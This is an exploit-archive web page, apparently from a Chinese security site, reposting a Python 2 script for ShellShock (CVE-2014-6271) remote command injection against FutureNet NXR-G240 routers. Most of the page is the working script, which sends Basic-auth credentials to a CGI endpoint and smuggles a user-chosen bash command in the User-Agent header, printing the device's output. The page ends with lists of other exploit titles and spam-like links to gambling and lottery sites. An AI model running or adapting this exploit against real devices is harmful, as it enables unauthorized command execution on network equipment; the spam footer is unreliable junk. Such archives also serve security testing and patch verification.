首頁 | 安全文章 | 安全工具 | Exploits | 本站原創 | 關于我們 | 網站地圖 | 安全論壇
  當前位置:主頁>安全文章>文章資料>Exploits>文章內容
FutureNet NXR-G240 Series ShellShock Command Injection
來源:wassline at gmail.com 作者:Asrir 發布時間:2018-12-10  
# -*- coding: utf-8 -*-
# Title: FutureNet NXR-G240 Series - "ShellShock" Remote Command Injection
# Date: 2018-06-12
# Author: Nassim Asrir
# You have a Q ? Contact me at: https://www.linkedin.com/in/nassim-asrir-b73a57122/
# Vendor: http://www.centurysys.co.jp/
# CVE: CVE-2014-6271
# Greetz to : Nadia BENCHIKHA for the great help.
# Example:
# [[email protected]]a[/home/sniperpex/Desktop]
# #python ./exploit.py http://server -u admin -p admin -c ps

import urllib2
import base64
import bs4
import sys
import argparse
reload(sys)
sys.setdefaultencoding('utf8')

ap = argparse.ArgumentParser(description="FutureNet NXR-G240 Series - ShellShock Remote Command Injection ")

ap.add_argument("host", help="(Example: http://127.0.0.1).")

ap.add_argument("-u", "--user", help="Admin username (Default: admin)")

ap.add_argument("-p", "--password", help="Admin password (Default: admin)")

ap.add_argument("-c", "--cmd", help="Command to run.")

args = ap.parse_args()

request = urllib2.Request(args.host+"/cgi-bin/information.cgi?section=arp&module=system&command=execute")

base64string = base64.encodestring('%s:%s' % (args.user, args.password)).replace('\n', '')

print '[+] Authentication & Exploit in progress...'

request.add_header("Authorization", "Basic %s" % base64string)

request.add_header("User-Agent", "() { :;}; /bin/bash -c "+str(args.cmd))

response = urllib2.urlopen(request)

soup = bs4.BeautifulSoup(response, 'html.parser')

for textarea in soup.find_all('pre'):

    print textarea.get_text().replace("# ARPaea +-",'').replace("e!"c$?oaSSaa3/4aa",'')

 
[推薦] [評論(0條)] [返回頂部] [打印本頁] [關閉窗口]  
匿名評論
評論內容:(不能超過250字,需審核后才會公布,請自覺遵守互聯網相關政策法規。
 §最新評論:
  熱點文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VideoScript 3.0 <= 4.0.1.50 Of
  相關文章
·i-doit CMDB 1.11.2 - Remote Co
·MiniShare 1.4.1 HEAD / POST Bu
·Textpad 8.1.2 - Denial Of Serv
·XNU POSIX Shared Memory Mappin
·HasanMWB 1.0 SQL Injection
·Google Chrome 70.0.3538.77 Cro
·NUUO NVRMini2 3.9.1 - Authenti
·CyberLink LabelPrint 2.5 Stack
·OpenSSH < 7.7 - User Enumerati
·WebKit JIT Proxy Object Issue
·Xorg X11 Server (AIX) - Local
·Linux userfaultfd tmpfs File P
  推薦廣告
CopyRight © 2002-2019 VFocuS.Net All Rights Reserved
北京单场4串1是什么意思 网络做什么赚钱 微信打字赚钱平台30元 上海时时乐开奖综合走 可以的捕鱼游戏 金都棋牌游戏? 广西11选五投注 绿码数字在其中什么肖 未来云南麻将 极速赛车彩票 大富翁捕鱼红包特别版